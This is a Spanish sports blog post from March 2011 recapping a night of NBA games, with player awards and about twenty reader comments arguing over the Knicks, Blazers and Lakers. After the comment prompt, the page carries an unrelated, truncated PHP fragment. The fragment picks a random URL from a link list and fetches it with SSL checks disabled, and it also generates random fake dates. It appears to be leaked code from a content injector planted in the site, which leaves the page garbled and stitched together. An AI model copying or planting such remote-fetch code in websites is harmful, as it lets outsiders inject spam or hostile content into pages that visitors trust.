La Crónica (28/03/2011)

29 de March de 2011 por TheDeerHunter

Tocaba rebelión de los modestos. En cada uno de los duelos se llevó el gato al agua el equipo de peor balance.

Perdieron los Spurs. Sin Duncan, Ginobili ni Parker se encomendaron a George Hill y Tiago Splitter y con tales mimbres aún plantaron relativa cara, a pesar de no ser el día de Gary Neal. De no ser por el horrible acierto desde el tiro libre y desde más allá de la línea de 3 tal vez hubiera cantado otro gallo. Con una mala versión de LaMarcus los Blazers no hicieron demasiada leña de los problemas de su rival. Los mejores fueron Andre Miller y Matthews por el equipo de Oregón (100-92).

Perdieron también los Bulls, sorprendidos en casa por los Sixers (97-85). Iguodala rozó el triple doble y Thaddeus se rehizo de la pésima actuación anterior (no así Lou Williams) para lograr la machada. Rose se vió muy solo y nervioso. Perdió hasta 10 balones, justo el doble de las asistencias que repartió pero aún así fue el único que encontró aro. Lo podemos considerar como un accidente contra un buen equipo. Accidente bastante inoportuno, eso sí. Hubiera sido un buen día para asegurar la primera plaza del Este, porque los Celtics también cayeron en Indianapolis (100-107). Volvió Rondo y fue el mejor de los suyos pero como viene siendo habitual las últimas semanas el center de turno les hizo daño, en este caso Hibbert, y perdieron los rebotes. La defensa tampoco está como suele y encajaron un 55% en tiro. Los verdes no se pueden permitir ese tipo de problemas.

Por si esto no fuera suficiente Orlando perdió en Nueva York ante la mejor versión de Carmelo desde el traspaso (106-113). Vimos una sonrisa clavada en su cara durante toda la noche y lo cierto es que su juego acompañaba esa “extraña” expresión. Menos sonreía Stat, que le tocó bailar con un Howard imparable. Arenas sustituyó a un Nelson de baja y estuvo tan horrible en el tiro como siempre. El choque se fue a la prórroga aunque los Knicks estuvieron muy cerca de cerrarlo antes. En ella hubo graves decisiones en contra de los visitantes y los Knicks lograron romper su penosa racha de derrotas.

Finalmente, los Bobcats ganaron de uno a Milwaukee (86-87) en la vuelta de Michael Redd, y los Wizards doblegaron a Utah también en la prórroga, con una extraordinaria actuación de John Wall (100-95).

PREMIOS

MVP: Hacía tiempo que no veíamos a Carmelo Anthony por aquí. Anoche se lo ganó a pulso con 39 puntos y  10 rebotes. Parece que la única manera que tienen ahora mismo los Knicks de sacar los partidos adelante es gracias al talento de Carmelo o Stoudamire.

Rookie: Si John Wall controla las pérdidas (anoche sólo 2) y su acierto en el tiro (un 50%) resulta prácticamente imparable. Anoche volvió locos a los Jazz y acabó el partido con 28 puntos, 6 rebotes y 7 asistencias.

Sorpresa: La baja de Devin Harris le ha dado temporalmente la titularidad a Earl Watson. Anoche le tocó bailar con la más fea pero cumplió con 13 puntos, 7 rebotes y 9 asistencias.

Decepción: 10 pérdidas son demasiadas pérdidas aunque anotes 31 puntos. Mal día para Derrick Rose que entra directamente en la historia. No muchos jugadores pueden decir que han conseguido dobles dígitos en este apartado.

Esfuerzo en vano: “Superman” Howard cumplió con su parte (29 puntos y 18 rebotes) pero no fue suficiente para imponerse a los Knicks.

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. the wolf dice:
    #1

    lo de melo agarrando al rival y tirandolo al suelo es un tanto sucio

      Citar

  2. Len Bias dice:
    #2

    Y encima le pitan falta a J-Rich, que también le agarró, pero después

      Citar

  3. Ru dice:
    #3

    La jugada de Howard con reverso y que acaba en mate con Stoudemire “encima” es bestial.

      Citar

  4. Denise dice:
    #4

    Total, que aprovechando que el partido estaba igualado, hubiera sido muy mal para la imagen de estos pateticos y loosers Knicks otra derrota más, y los arbitros se encargaron de ser su sexto hombre cargando de faltas a los Magic.
    Los Magic tampoco jugaron muy bien, Arenas es un lastre, y el equipo no tiene a nadie capaz de defender a un alero anotador, como tenía el año pasado con Pietrus y Barnes.
    Jornada redonda para Lakers con la derrota esperada de los Spurs acusando las bajas, la ya no tan sorpresa de Boston perdiendo contra los Pacers, y el sorpresón de los Bulls perdiendo contra el equipo revelación como los Sixers.
    PD: Pau Gasol en su twitter sintiendose orgulloso de haber ido a un concierto de Lady Gaga. A este paso me va a empezar a caer mal.

      Citar

  5. TX dice:
    #5

    No se si la victoria de Portland se puede clasificar como sorpresa. Cuidadito con ellos que tienen un equipazo! Que pena la falta de juego interior. Llega a estar Oden aunque fuera a un 30% de su capacidad y aspirarian al anillo

      Citar

  6. TheDeerHunter dice:
    #6

    @Ru: Sí, ahí se ve que Stoudemire es todo un perro de presa. Un caniche de presa, si acaso.

    @Denise: Vaya robazo a los Magic, pero hablar de los árbitros es tan políticamente incorrecto…
    -A Pietrus lo habéis tenido este año hasta que le han dado puerta. Otro dato a favor de que el trade con Gortat fue bastante poco productivo.
    -Diría que tal y como están las cosas los Lakers harían bien en asegurar tan sólo el 2º mejor balance.
    -Más allá que te guste la música de la tipa o la tipa misma un concierto de Lady Gaga debe de ser una experiencia increíble… supongo.

      Citar

  7. Vader dice:
    #7

    @Denise

    Pateticos y losers Knicks…? Pues suerte que esta temporada estan en playoff despues de no se cuanto… Macho no se que teneis algunos en contra de los Knicks. Por lo menos es una franquicia que intenta ganar, se gasta el dinero y apuestan por jugadores de calidad y espectaculares.

      Citar

  8. TheDeerHunter dice:
    #8

    Lo pones a huevo, Vader… sin acritud XD:

    Eddie Curry, Jerome James, Brian Cardinal, Jared Jeffries, Malik Rose, Mardy Collins, Anthony Robertson, Darko Milicic, Chris Wilcox…
    “jugadores de calidad y espectaculares”

    jajajaja

      Citar

  9. Vader dice:
    #9

    Jajaja que mamon!! mas bien me referia a Melo, Stat, Billups y no hace mucho Zach Randolph, Jamal Crawford… Que hace tiempo que no levantamos cabeza, pero por lo menos se intenta y no como Bobcats y franquicias parecidas…

      Citar

  10. Sancho88 dice:
    #10

    TX, Portland son buenos, pero no vamos a exagerar tampoco. Lo de anoche contra Spurs era hasta previsible. Llevan 4 partidos seguidos perdiendo: dos contra Memphis, uno contra Denver y otro contra Portland. Les destrozan los equipos rápidos, y el factor común es la baja de Duncan y el deficit de centímetros en la pintura. No lo vi ayer, pero creo que Camby y Aldridge se comieron con patatas a Blair y Splitter. Vale, Splitter es grande pero le han tenido en el ostracismo toda la temporada y ahora no le puedes exigir nivel playoff. Lo han hecho muy mal con él, y además Popovich le da más confianza al vejestorio McDyess, que no está ya para muchos ni pocos trotes.
    Pero vamos, nada nuevo bajo el sol. Miami va cogiendo enteros, Lakers ahora mismo son favoritísimos para el threepeat y Boston Y SAS lo de siempre, en casa se crecen y si salen fuertes en playoffs podrán pasar las rondas que tengan ventaja de campo, pero cuando lleguen a la final contra Miami y LA, o en semis si me apuras, contra Chicago y Oklahoma, palmarán alguno en casa y fuera… como hermanitas de la caridad. La verdad, que Boston está decepcionando mucho, no tienen rotación exterior, y SAS tiene mala suerte con las lesiones, pero como ya comenté el otro día, empiezan a no saber manejar los minutos finales, que era siempre su principal cualidad en la última década.
    Pero bueno, Portland para el anillo ni de coña. El otro día, los Thunder les untaron sin compasión en lo morritos y una vez que les castigan defensivamente no son capaces de sobreponerse. Y además Roy está en otro universo, no parece enterarse de nada. Y hablas de Oden, pero tampoco se yo si ese hombre es en realidad todo lo que contaron de él. Su excusa es la rodilla, pero incluso el mayor lesionado de rodilla en los ultimos tiempos (obviando a Livingston), Bynum, sí que demuestra un gran puto nivel ofensivo, y si se centra, defensivo con sus chapas y tal. Wes Mathews tampoco está en estado de gracia, por no hablar de Rudy y su tiro exterior… buf, pues no les queda ni nada para aspirar al titulo

      Citar

  11. Denise dice:
    #11

    @deerhunter: Yo no tengo la culpa de que echasen a Pietrus, por mi que lo hubiesen dejado. El trade con Gortat está bien (dentro de lo que cabe), los demás equipos no son tontos, no es tan facil conseguir un 3 defensor de calidad. Cuando jueguen contra un alero muy ofensivo tipo Melo, James o Pierce, probaría unos minutillos a Bass a ver si él puede defenderlos relativamente bien.
    @Vader: Deerhunter me ha quitado la respuesta…, y sí, son loosers como siempre, aunque acostumbrados a no entrar en playoffs, para los Knicks y sus aficionados, el caer en primera ronda debe ser como un titulo.:)

      Citar

  12. TX dice:
    #12

    @Sancho88 No digo esto en un sobresalto por que haya ganado a SAS, cosa que como bien dices era hasta previsible, si no fijate que equipazo tienen. Andre Miller, un base correcto, medianamente repartidor de juego y un seguro de que va a estar. Un gran escudero como W.Matthews que después de All Star es de los que más triples está marcando por detrás de Douglas, que además tiene el físico y las cualidades para hacer un gran marcaje en casi cualquier escolta de la liga. Un casi-AllStar como es Gerald Wallace: de los mejores aleros defensivos de la liga. Jugador versátil que, aunque sí es verdad que dependa bastante de su físico, aporta mucha intensidad defensiva (tanto en robos, chapas y rebotes; acordaros el año pasado), tiene buen tiro de tres y entra a canasta con gran efectividad. Luego tenemos a LA. Para mi tenía que haber estado en el All Star Game, pero bien su puesto tenía mucha competencia. Te aporta uno de los mejores ataques en el poste, rebote (mejor ofensivo que defensivo), tiro a media distancia… aunque es un poco blando en defensa, aunque este año se nota que lo está corrigiendo bastante. Y para terminar, Marcus Camby. Un veterano con unas de las medias más altas en rebotes y bastante buen defensor, más por su veteranía que por su actual estado físico.
    Si a todo ello le sumas que tienen un banquillo de lujo: Batum, Roy que por cierto tienes que reconocer que está cambiando su forma de jugar a una más colectiva y Rudy que aporta intensidad defensiva y tiro (esto cuando se juega en Portland).
    Además, cuentan con un “gran” entrenador, según lo quieras ver, como es McMillan; que aunque evite los contraataques es uno de los mejores jugando en estático y bastante buen defensor.
    La única pega de todo esto sería el juego interior de cara a los PlayOffs, ya que ni Camby ni LA cumplen el estado físico que se requiere para los jugadores interiores en PlayOffs, por eso digo lo de Oden. No digo que sea muy bueno, pero vendría como agua de mayo.

    En definitiva, no se que te parece de raro que este equipo pueda dar la sorpresa y llegue a finales o incluso ganaran con suerte el anillo (si toca contra un rival como Miami que tampoco tiene juego interior) si tuvieran un poco más de juego interior.

      Citar

  13. Denise dice:
    #13

    Los Blazers tienen un equipazo, que pueden tumbar a cualquiera del Oeste excepto a los Lakers, por la inexperiencia de los jugadores, y porque salen perdiendo por dentro. Aldridge es muy bueno pero no tanto como Gasol (por ahora), Bynum se come a Camby, y Odom y Gerald Wallace están mas o menos empatados.
    Lo mejor de los Blazers es que tendrían hasta 4 tios (Matthews, Batum, Rudy y Roy) para repartirse la defensa a Kobe y extenuarlo. No muchos equipos pueden pernitirse eso.

      Citar

  14. Sancho88 dice:
    #14

    Por mentalidad, no les veo equipo campeón. Necesitan siempre mucho apoyo del Rose Garden. Y en estático casi siempre dependen del buen dia de LA o de Wallace. Ahora bien, lo que tu dices de Roy. A ver, su tecnica individual es acojonante,mete canastas hasta sin mirar, solo confiando en su maravilloso juego de pies. es un jugador especial y superestrella, y eso esta fuera de toda duda, pero no le veo demasiado enchufado. Para mí, si Roy consigue enchufarse pueden llegar a las finales, como ha llegado Denver otros años, pero no se, yo pronostico que como mucho les ganan a Dallas, que ya sabemos el equipo que son siempre en las regulars seasons, mas de diez años pasando de 50 victorias, bla bla bla. Pero en PO se giñan. Hasta los Spurs el año pasado, que estaban mermadisimos, se los comieron con papas. Por tanto, les veo en semis contra LA y deventaja de campo… muy jodido que pasen de ahí, sinceramente.

      Citar

  15. TX dice:
    #15

    El que le eliminó de PlayOffs fue los Suns, creo recordar. De todos modos… ¿Como llegó Portland el año pasado a PO? Con ROY medio lesionado que no pudo jugar hasta no se que partido, sin Batum, sin Pryzbilla, sin Oden (como no) y sin que LA hubiera explotado todavía…

      Citar

  16. Viva_Dirk dice:
    #16

    @Denise: Estoy deseando ver el uso que hace de esos 4 hombres que dices el Sr.McMillan, tiene casi con total seguridad la mejor rotación de alero de la liga y vas a ver como reparte responsabilidades.

      Citar

  17. KB # 24 dice:
    #17

    @TX: G.Wallace un buen tiro de tres? 0.32 este año eh, tampoco es que sea un tirador, más bien es un perro de presa con un buen tirito de media distancia y un saltarín en ambos aros

      Citar

  18. HisRoyalAirness dice:
    #18

    Sòlo de pensar en Rudy y Matthews defendiendo a Kobe me dan ganas de abrazarlos de la pena que me dan… Si el objetivo es frenarlo supongo que será para forrarlo a ostias y repartir faltas porque ni en sus mejores sueños pueden desgastarlo sólo defendiendo

      Citar

  19. Sancho88 dice:
    #19

    La venganza del comic sans

    Solo en los mejores cines

      Citar

  20. fhngv dice:
    #20

    @Denise

    puede que nosotros estemos acostumbrados a no ir a playoffs este milenio pero, cuantos anillos tiene orlando?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>